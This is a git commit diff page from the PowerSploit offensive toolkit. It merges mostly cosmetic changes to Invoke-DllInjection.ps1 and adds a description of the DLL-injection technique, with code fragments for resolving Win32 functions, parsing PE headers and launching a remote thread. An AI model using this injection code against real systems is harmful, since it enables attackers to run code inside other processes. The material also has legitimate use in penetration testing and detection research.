diff options
| author | Dave Hull <dave.hull@tanium.com> | 2017-09-08 16:33:11 -0500 |
|---|---|---|
| committer | Dave Hull <dave.hull@tanium.com> | 2017-09-08 16:33:11 -0500 |
| commit | 6eb3c6f281f0812a103283d1da80be14bb04f944 (patch) | |
| tree | cfe2e46596ef251274e954c267c5634d62991da2 /CodeExecution/Invoke-DllInjection.ps1 | |
| parent | bf652bcd261c2c74445c2aa1b4e283c4bf167109 (diff) | |
| parent | 3d0d32d9ee6af70f0dfd5ecfe809a49a65d6822d (diff) | |
| download | PowerSploit-6eb3c6f281f0812a103283d1da80be14bb04f944.tar.gz PowerSploit-6eb3c6f281f0812a103283d1da80be14bb04f944.zip | |
Merge branch 'dev' of github.com:PowerShellMafia/PowerSploit into dev
Diffstat (limited to 'CodeExecution/Invoke-DllInjection.ps1')
| -rw-r--r-- | CodeExecution/Invoke-DllInjection.ps1 | 60 |
1 files changed, 33 insertions, 27 deletions
diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1 index 369d606..d23e989 100644 --- a/CodeExecution/Invoke-DllInjection.ps1 +++ b/CodeExecution/Invoke-DllInjection.ps1 @@ -5,15 +5,19 @@ function Invoke-DllInjection Injects a Dll into the process ID of your choosing.
-PowerSploit Function: Invoke-DllInjection
-Author: Matthew Graeber (@mattifestation)
-License: BSD 3-Clause
-Required Dependencies: None
-Optional Dependencies: None
+PowerSploit Function: Invoke-DllInjection
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
.DESCRIPTION
Invoke-DllInjection injects a Dll into an arbitrary process.
+It does this by using VirtualAllocEx to allocate memory the size of the
+DLL in the remote process, writing the names of the DLL to load into the
+remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread
+to invoke LoadLibraryA in the context of the remote process.
.PARAMETER ProcessID
@@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information. http://www.exploit-monday.com
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [CmdletBinding()]
Param (
[Parameter( Position = 0, Mandatory = $True )]
[Int]
@@ -59,7 +65,7 @@ http://www.exploit-monday.com {
Throw "Process does not exist!"
}
-
+
# Confirm that the path to the dll exists
try
{
@@ -79,11 +85,11 @@ http://www.exploit-monday.com Param
(
[OutputType([Type])]
-
+
[Parameter( Position = 0)]
[Type[]]
$Parameters = (New-Object Type[](0)),
-
+
[Parameter( Position = 1 )]
[Type]
$ReturnType = [Void]
@@ -98,7 +104,7 @@ http://www.exploit-monday.com $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
$MethodBuilder.SetImplementationFlags('Runtime, Managed')
-
+
Write-Output $TypeBuilder.CreateType()
}
@@ -107,11 +113,11 @@ http://www.exploit-monday.com Param
(
[OutputType([IntPtr])]
-
+
[Parameter( Position = 0, Mandatory = $True )]
[String]
$Module,
-
+
[Parameter( Position = 1, Mandatory = $True )]
[String]
$Procedure
@@ -128,7 +134,7 @@ http://www.exploit-monday.com $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
-
+
# Return the address of the function
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
}
@@ -142,43 +148,43 @@ http://www.exploit-monday.com [String]
$Path
)
-
+
# Parse PE header to see if binary was compiled 32 or 64-bit
$FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read)
-
+
[Byte[]] $MZHeader = New-Object Byte[](2)
$FileStream.Read($MZHeader,0,2) | Out-Null
-
+
$Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
if ($Header -ne 'MZ')
{
$FileStream.Close()
Throw 'Invalid PE header.'
}
-
+
# Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header)
$FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null
-
+
[Byte[]] $lfanew = New-Object Byte[](4)
-
+
# Read offset to the PE Header (will be read in reverse)
$FileStream.Read($lfanew,0,4) | Out-Null
- $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join ''))
-
+ $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join ''))
+
# Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE
$FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null
[Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2)
-
+
# Read compiled architecture
$FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null
- $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '')
+ $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '')
$FileStream.Close()
-
+
if (($Architecture -ne '014C') -and ($Architecture -ne '8664'))
{
Throw 'Invalid PE header or unsupported architecture.'
}
-
+
if ($Architecture -eq '014C')
{
Write-Output 'X86'
@@ -193,7 +199,7 @@ http://www.exploit-monday.com }
}
-
+
# Get addresses of and declare delegates for essential Win32 functions.
$OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
$OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
@@ -307,7 +313,7 @@ http://www.exploit-monday.com {
Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))"
}
-
+
$VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
# Close process handle
@@ -317,7 +323,7 @@ http://www.exploit-monday.com # Extract just the filename from the provided path to the dll.
$FileName = (Split-Path $Dll -Leaf).ToLower()
- $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) }
+ $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) }
if (!$DllInfo)
{
|